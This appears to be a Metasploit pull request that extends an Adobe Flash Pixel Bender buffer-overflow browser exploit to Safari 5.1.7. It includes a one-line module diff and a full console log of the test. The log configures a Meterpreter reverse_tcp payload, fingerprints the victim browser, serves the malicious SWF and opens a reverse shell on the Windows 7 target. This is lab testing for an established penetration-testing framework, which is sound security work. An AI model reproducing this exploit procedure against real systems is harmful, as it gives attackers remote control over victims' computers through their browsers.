### PR TITLE
Test adobe_flash_pixel_bender_bof on Safari 5.1.7

### DIFF
--- a/modules/exploits/windows/browser/adobe_flash_pixel_bender_bof.rb
+++ b/modules/exploits/windows/browser/adobe_flash_pixel_bender_bof.rb
@@ -52,7 +52,7 @@ class Metasploit3 < Msf::Exploit::Remote
         {
           :source  => /script|headers/i,
           :os_name => Msf::OperatingSystems::WINDOWS,
-          :ua_name => lambda { |ua| ua == Msf::HttpClients::IE || ua == Msf::HttpClients::FF},
+          :ua_name => lambda { |ua| ua == Msf::HttpClients::IE || ua == Msf::HttpClients::FF || ua == Msf::HttpClients::SAFARI},
           :flash   => lambda { |ver| ver =~ /^11\./ || ver =~ /^12\./ || (ver =~ /^13\./ && ver <= '13.0.0.182') }
         },
       'Targets'        =>


### PR DESCRIPTION
Added browser-requirement for Safari after successful test using Safari 5.1.7 with Adobe Flash Player 13.0.0.182 running on Windows 7 SP1.
## Verification
- [x] Test on Safari 5.1.7 with Adobe Flash Player 13.0.0.182 running on Windows 7 SP1.

```

msf > use exploit/windows/browser/adobe_flash_pixel_bender_bof 
msf exploit(adobe_flash_pixel_bender_bof) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(adobe_flash_pixel_bender_bof) > set LHOST 192.168.0.1
LHOST => 192.168.0.1
msf exploit(adobe_flash_pixel_bender_bof) > set VERBOSE true 
VERBOSE => true
msf exploit(adobe_flash_pixel_bender_bof) > show options 

Module options (exploit/windows/browser/adobe_flash_pixel_bender_bof):

   Name        Current Setting  Required  Description
   ----        ---------------  --------  -----------
   Retries     false            no        Allow the browser to retry the module
   SRVHOST     0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT     8080             yes       The local port to listen on.
   SSL         false            no        Negotiate SSL for incoming connections
   SSLCert                      no        Path to a custom SSL certificate (default is randomly generated)
   SSLVersion  SSL3             no        Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)
   URIPATH                      no        The URI to use for this exploit (default is random)


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (accepted: seh, thread, process, none)
   LHOST     192.168.0.1      yes       The listen address
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic


msf exploit(adobe_flash_pixel_bender_bof) > exploit 
[*] Exploit running as background job.

[*] Started reverse handler on 192.168.0.1:4444 
[*] Using URL: http://0.0.0.0:8080/zDuGiFPdrSDlF3D
[*]  Local IP: http://10.0.2.15:8080/zDuGiFPdrSDlF3D
[*] Server started.
msf exploit(adobe_flash_pixel_bender_bof) > [*] 192.168.0.146    adobe_flash_pixel_bender_bof - 192.168.0.146    adobe_flash_pixel_bender_bof - No cookie received, resorting to headers hash.
[*] 192.168.0.146    adobe_flash_pixel_bender_bof - Gathering target information.
[*] 192.168.0.146    adobe_flash_pixel_bender_bof - Sending response HTML.
[*] 192.168.0.146    adobe_flash_pixel_bender_bof - 192.168.0.146    adobe_flash_pixel_bender_bof - Info receiver page called.
[*] 192.168.0.146    adobe_flash_pixel_bender_bof - 192.168.0.146    adobe_flash_pixel_bender_bof - Received cookie 'gditGNlIXjnjDV'.
[!] 192.168.0.146    adobe_flash_pixel_bender_bof - 192.168.0.146    adobe_flash_pixel_bender_bof - Received sniffed browser data over POST: 
{"os_name"=>["Microsoft Windows"], "os_flavor"=>["7"], "ua_name"=>["Safari"], "ua_ver"=>["5.1.7"], "arch"=>["x86"], "java"=>["null"], "silverlight"=>["false"], "flash"=>["13.0"]}.
[*] 192.168.0.146    adobe_flash_pixel_bender_bof - 192.168.0.146    adobe_flash_pixel_bender_bof - Received cookie 'gditGNlIXjnjDV'.
[*] 192.168.0.146    adobe_flash_pixel_bender_bof - 192.168.0.146    adobe_flash_pixel_bender_bof - Serving exploit to user with tag gditGNlIXjnjDV
[*] 192.168.0.146    adobe_flash_pixel_bender_bof - 192.168.0.146    adobe_flash_pixel_bender_bof - Setting target "gditGNlIXjnjDV" to :tried.
[!] 192.168.0.146    adobe_flash_pixel_bender_bof - 192.168.0.146    adobe_flash_pixel_bender_bof - Comparing requirement: source=(?i-mx:script|headers) vs k=script
[!] 192.168.0.146    adobe_flash_pixel_bender_bof - 192.168.0.146    adobe_flash_pixel_bender_bof - Comparing requirement: os_name=Microsoft Windows vs k=Microsoft Windows
[!] 192.168.0.146    adobe_flash_pixel_bender_bof - 192.168.0.146    adobe_flash_pixel_bender_bof - Comparing requirement: ua_name=#<Proc:0x114cbcf4@/root/metasploit-framework/modules/exploits/windows/browser/adobe_flash_pixel_bender_bof.rb:55 (lambda)> vs k=Safari
[!] 192.168.0.146    adobe_flash_pixel_bender_bof - 192.168.0.146    adobe_flash_pixel_bender_bof - Comparing requirement: flash=#<Proc:0x114cbce0@/root/metasploit-framework/modules/exploits/windows/browser/adobe_flash_pixel_bender_bof.rb:56 (lambda)> vs k=13.0
[*] 192.168.0.146    adobe_flash_pixel_bender_bof - Request: /zDuGiFPdrSDlF3D/AaKoCP/
[*] 192.168.0.146    adobe_flash_pixel_bender_bof - Sending HTML...
[*] 192.168.0.146    adobe_flash_pixel_bender_bof - 192.168.0.146    adobe_flash_pixel_bender_bof - Received cookie 'gditGNlIXjnjDV'.
[*] 192.168.0.146    adobe_flash_pixel_bender_bof - 192.168.0.146    adobe_flash_pixel_bender_bof - Received cookie 'gditGNlIXjnjDV'.
[*] 192.168.0.146    adobe_flash_pixel_bender_bof - 192.168.0.146    adobe_flash_pixel_bender_bof - Serving exploit to user with tag gditGNlIXjnjDV
[*] 192.168.0.146    adobe_flash_pixel_bender_bof - 192.168.0.146    adobe_flash_pixel_bender_bof - Setting target "gditGNlIXjnjDV" to :tried.
[!] 192.168.0.146    adobe_flash_pixel_bender_bof - 192.168.0.146    adobe_flash_pixel_bender_bof - Comparing requirement: source=(?i-mx:script|headers) vs k=script
[!] 192.168.0.146    adobe_flash_pixel_bender_bof - 192.168.0.146    adobe_flash_pixel_bender_bof - Comparing requirement: os_name=Microsoft Windows vs k=Microsoft Windows
[!] 192.168.0.146    adobe_flash_pixel_bender_bof - 192.168.0.146    adobe_flash_pixel_bender_bof - Comparing requirement: ua_name=#<Proc:0x114cbcf4@/root/metasploit-framework/modules/exploits/windows/browser/adobe_flash_pixel_bender_bof.rb:55 (lambda)> vs k=Safari
[!] 192.168.0.146    adobe_flash_pixel_bender_bof - 192.168.0.146    adobe_flash_pixel_bender_bof - Comparing requirement: flash=#<Proc:0x114cbce0@/root/metasploit-framework/modules/exploits/windows/browser/adobe_flash_pixel_bender_bof.rb:56 (lambda)> vs k=13.0
[*] 192.168.0.146    adobe_flash_pixel_bender_bof - Request: /zDuGiFPdrSDlF3D/AaKoCP/Oggvh.swf
[*] 192.168.0.146    adobe_flash_pixel_bender_bof - Sending SWF...
[*] Sending stage (770048 bytes) to 192.168.0.146
[*] Meterpreter session 2 opened (192.168.0.1:4444 -> 192.168.0.146:50211) at 2014-05-20 00:55:56 +0200

msf exploit(adobe_flash_pixel_bender_bof) > 
```

NOTE: Notice the poor version detection of Flash when running on Safari ("13.0").
